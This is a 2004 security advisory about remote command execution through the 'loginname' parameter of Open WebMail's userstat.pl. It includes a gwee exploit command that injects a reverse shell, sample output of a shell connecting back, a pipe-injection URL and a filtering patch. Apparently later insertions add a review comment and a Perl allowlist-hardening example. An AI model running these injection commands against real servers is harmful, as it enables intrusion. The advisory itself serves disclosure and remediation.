Message-ID: <200405100129.01331.michel@cycom.se>
From: michel at cycom.se (Michel Blomgren)
Subject: CSA-200402-1: Previous Open Webmail vulnerability is exploitable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cycom AB Security Advisory CSA-200402-1
www.cycom.se
Advisory: Previous Open Webmail vulnerability is exploitable
Date: Sat Feb 21 15:18:21 CET 2004,
updated: Thu May 6 10:37:29 CEST 2004
Application: Open Webmail 2.20, 2.21 and 2.30 (and -current)
Vulnerability: Remote arbitrary command execution
Availability: http://openwebmail.org
Platforms: OS independent (multiple *NIXes)
Status: Patch is available (included in this advisory)
Reference: CSA-200402-1
Author: Michel Blomgren <michel@...om.se>
SYNOPSIS
"Open WebMail is a webmail system based on the Neomail version 1.14
from Ernie Miller. Open WebMail is designed to manage very large mail
folder files in a memory efficient way. It also provides a range of
features to help users migrate smoothly from Microsoft Outlook to
Open WebMail."
-- http://openwebmail.org
VULNERABILITY
Nullbyte and Syscalls discovered that a near-obsolete script named
userstat.pl shipped with Open Webmail 2.20, 2.21 and 2.30 doesn't
filter out dangerous *nix shell characters from the "loginname"
parameter. The "loginname" parameter is passed as an argument when the
vulnerable script executes openwebmail-tool.pl. By appending a
";", "|" or "( )" followed by a shell command to an HTTP GET, HEAD
or POST request, an attacker can execute arbitrary system commands as
an unprivileged user (e.g. the Apache user, "nobody" or "www").
DISCOVERY
The vulnerability was found by Nullbyte and Syscalls of UDC.
EXPLOIT
At least two exploits are in circulation, one by Nullbyte and one rewrite by
Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30 5.8MB) is
limited (read the "FIX" section below). You can use Gwee (generic web
exploitation engine), available from http://cycom.se/dl/gwee, to exploit using
the following command:
$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl
-L Use built-in TCP listener (like "nc -l").
-l The host or IP address to have the reverse shellcode connect
back to.
-p The port to have the reverse shellcode connect back to.
For example...
$ gwee -y'loginname=%3B' -l localhost -p12345 -Lf localhost/userstat.cgi
!!!
` ___ '
- (0 0) -
- -----oOo(_)oOo---------------------------------------- ----- --- -- - -
gwee 1.21 - generic web exploitation engine
Copyright (C) 2004 Michel Blomgren <shadowinteger@...tinix.org>
Perl and Python shellcode by Sabu <sabu@...tinix.org>
Acknowledgements: Sabu and Nullbyte
[i] target: localhost
[i] using POST requests to send data
[i] shellcode: Sabu's reverse Perl shellcode (portable)
[i] injection method: perl -e
[+] resolving localhost into an ip address
[i] shellcode will connect to 127.0.0.1 on port 12345
[i] will listen for incoming connection on port 12345
[+] attempting to inject shellcode into target
[+] listening for incoming connection on port 12345, timeout is 30 seconds
[i] got connection from 127.0.0.1:33670
Linux luserland 2.4.22-openmosix-1 #1 Thu Mar 18 09:55:31 CET 2004 i686 unknown
12:05:52 up 3:56, 7 users, load average: 0.08, 0.02, 0.01
FIX
Cycom AB has provided a diff patch that fixes the issue. Ken Girrard
<kgirrard.AT.users.sourceforge.net> wrote and published an advisory long
before this one. The patch he provided with his advisory leaves userstat.pl
still vulnerable to remote arbitrary command execution; that patch is applied
to (shipped with) openwebmail-current.tgz released 2004-04-30 (5.8MB).
Girrard's patch doesn't filter out "|" (pipes) and "/", but does filter out
spaces and tabs, which makes it impossible to pass arguments to commands an
attacker would want to execute. Nevertheless, it is still possible to execute
commands without arguments. An example of such an attack: an attacker who has
write access to the box (via FTP, for example) uploads a reverse shellcode,
marks it executable and enters its absolute path in a crafted URL like this
one:
http://target/cgi-bin/openwebmail/userstat.pl&loginname=%7C/home/fu/bar
Our patch follows...
- --<snip>--
- --- userstat.pl.orig 2004-02-20 14:58:06.000000000 +0100
+++ userstat.pl 2004-02-21 18:05:16.000000000 +0100
@@ -52,6 +52,9 @@
my $html=qq|<a href="_URL_" target="_blank" style="text-decoration: none">|.
qq|<font color="_COLOR_">_TEXT_</font></a>|;
+# filter out dangerous characters
+$user =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
+
if ($user ne "") {
my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;
if ($status =~ /has no mail/) {
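Review bot: The added line `+$user =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;` is a blacklist that silently strips characters, while the unchanged context line `my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;` still hands the value to a shell through backticks, so whatever the class does not list (for instance `*`, `?`, `~`, `!`, `#` and a leading `-`, which openwebmail-tool.pl may read as an option) is still interpreted. Prefer rejecting the request when the name does not match an allowlist such as `/^[A-Za-z0-9][A-Za-z0-9._-]*\z/`, and invoke openwebmail-tool.pl via the list form of `open`/`system` so no shell is involved; the comment `# filter out dangerous characters` should also say why strip-and-continue was chosen over rejecting bad input.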
- --<snip>--
Enter cgi-bin/openwebmail/ and run:
$ patch -i owm.patch
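As an added illustration of the point made in the VULNERABILITY and FIX sections (this is example code, not the advisory's patch or Open WebMail's own code), the following Perl puts the vulnerable backtick pattern next to a hardened version that validates "loginname" against an allowlist and runs openwebmail-tool.pl without a shell. The $ow_cgidir path, the 32-character length limit and the sample names are assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example, not Open WebMail's code: allowlist validation of a login
# name plus a shell-free invocation of openwebmail-tool.pl.
use strict;
use warnings;

my $ow_cgidir = '/var/www/cgi-bin/openwebmail';   # assumed location

# Vulnerable pattern (as in userstat.pl): the raw CGI value is interpolated
# into a backtick command, so the shell parses any metacharacters in it.
sub mail_status_unsafe {
    my ($user) = @_;
    return `$ow_cgidir/openwebmail-tool.pl -m -e $user`;
}

# Allowlist check: accept only a plausible account name and reject everything
# else rather than silently stripping characters.  Requiring a leading letter
# or digit also keeps a value starting with "-" from being read as an option.
# The 32-character cap is an assumption for this example.
sub valid_loginname {
    my ($user) = @_;
    return defined $user && $user =~ /^[A-Za-z0-9][A-Za-z0-9._-]{0,31}\z/;
}

# Hardened pattern: validate first, then run the tool through the list form of
# open(), which passes each argument as-is and never involves a shell.
sub mail_status_safe {
    my ($user) = @_;
    die "invalid loginname\n" unless valid_loginname($user);
    open(my $fh, '-|', "$ow_cgidir/openwebmail-tool.pl", '-m', '-e', $user)
        or die "cannot run openwebmail-tool.pl: $!\n";
    my $status = do { local $/; <$fh> };   # slurp the tool's output
    close($fh);
    return $status;
}

# Constructed inputs: a normal name and values of the kinds the advisory
# describes (";" and "|" separators, a leading "-", a "/" in the name).
for my $name ('alice', 'bob;id', 'carol|x', '-e', 'dave/x') {
    printf "%-10s %s\n", $name, valid_loginname($name) ? 'accepted' : 'rejected';
}
```

Only the first sample name is accepted; the others are refused before any command is built, which is the difference between rejecting input and trying to sanitize it after the fact.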
ACKNOWLEDGMENTS
I would like to thank the following people:
Sabu, Nullbyte and Syscalls.
ABOUT CYCOM AB
Cycom AB is a newly started firm specializing in information security
services (penetration testing, risk assessment, source code review,
disaster/incident management and education). Visit us at
www.cycom.se.
- --
Michel Blomgren
Cycom AB
http://www.cycom.se
______________________________________________
PGP: http://www.cycom.se/misc/pubkeymichel.asc
886A 7B17 1747 6C82 7A7E
EAC0 A3F1 2943 101C 18FA
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)
iD8DBQFAnr6po/EpQxAcGPoRAudxAJ981KZ3PAq1mTH2Fbcbnu1ZvlvzAACfdV0h
0fzjuRdQkaua1yEJptqFyU4=
=tY6l
-----END PGP SIGNATURE-----